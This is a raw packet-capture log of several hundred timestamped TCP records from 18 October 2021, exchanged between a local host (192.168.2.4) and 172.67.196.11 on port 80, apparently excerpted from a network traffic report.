                                                                    Oct 18, 2021 08:02:35.485846996 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485883951 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485886097 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485922098 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485937119 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485960007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485996008 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486010075 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486035109 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486073017 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486108065 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486119986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486141920 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486162901 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486176014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486202002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486222982 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486239910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486249924 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486278057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486294985 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486314058 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486326933 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486352921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486358881 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486391068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486422062 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486438036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486460924 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486479044 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486480951 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486517906 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486530066 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486556053 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486567020 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486594915 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486615896 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486632109 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486638069 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486670017 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486682892 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486706018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486721039 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486747980 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486753941 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486794949 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486824989 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486833096 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486846924 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486870050 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486881018 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486908913 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486947060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486948967 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.486984968 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.486999989 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487025976 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487036943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487076044 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487134933 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487142086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487199068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487200022 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487231970 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487235069 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487277031 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487277031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487301111 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487304926 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487333059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487361908 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487373114 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487402916 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487409115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487451077 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487453938 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487488031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487498999 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487526894 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487534046 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487565041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487577915 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487601995 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487620115 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487638950 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487641096 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487677097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.487680912 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.487715006 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508613110 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508630991 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508646011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508658886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508677959 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508688927 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508708954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508727074 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508750916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508786917 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508799076 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508817911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508830070 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508851051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508865118 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508882999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508923054 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508935928 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508960009 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508990049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509013891 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509023905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509035110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509056091 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509068966 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509087086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509093046 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509119034 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509134054 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509150982 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509162903 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509191990 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509227037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509238005 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509258986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509268999 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509293079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509298086 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509324074 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509356022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509373903 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509387970 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509401083 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509419918 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509429932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509459019 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509463072 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509495020 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509500027 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509526014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509542942 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509558916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509568930 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509591103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509622097 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509622097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509651899 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509654045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509673119 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509685993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509695053 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509726048 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509763002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509773970 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509808064 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509814024 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509825945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509844065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509875059 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509876966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509900093 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509928942 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525856018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525895119 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525924921 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525926113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525949955 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525958061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525978088 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525996923 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526004076 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526031971 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526062965 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526074886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526086092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526112080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526134968 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526158094 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526179075 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526192904 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526201963 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526210070 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526235104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526247978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526251078 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526282072 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526309967 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526323080 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526343107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526369095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526372910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526384115 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526402950 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526423931 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526432991 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526456118 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526463032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526479006 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526500940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526534081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526560068 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526562929 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526592970 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526603937 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526622057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526649952 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526650906 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526676893 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526679993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526709080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526746035 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526747942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526760101 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526782036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526808977 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526813030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526834965 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526865005 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526895046 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526901007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526923895 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526933908 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526953936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526968002 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526984930 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526998043 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527021885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527034044 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527055025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527085066 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527105093 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527132988 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527168036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527179956 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527203083 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527220011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527250051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527275085 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527278900 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527295113 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527307987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527329922 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527338028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527352095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527374983 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527384996 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527409077 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527437925 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527458906 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527467966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527483940 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527498007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527513981 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527527094 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527558088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527566910 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527585030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527587891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527625084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527647018 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527654886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527657032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527666092 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527686119 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527717113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527719975 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527729988 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527746916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527761936 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527776003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527802944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527806044 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527828932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527836084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527852058 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527872086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527889013 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527905941 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527915955 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527935982 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527949095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527966022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527977943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527996063 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528024912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528044939 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528057098 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528085947 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528104067 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528119087 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528122902 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528156042 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528166056 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528184891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528198004 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528214931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549736023 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549772024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.549773932 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549778938 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.549812078 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549849987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549866915 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.549892902 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.549896955 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549938917 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549953938 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.549976110 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.549979925 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550013065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550024033 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550051928 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550061941 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550087929 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550126076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550137043 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550173044 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550173044 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550193071 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550223112 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550251961 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550281048 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550312042 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550339937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550364971 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550369978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550374985 CEST4981680192.168.2.4172.67.196.11
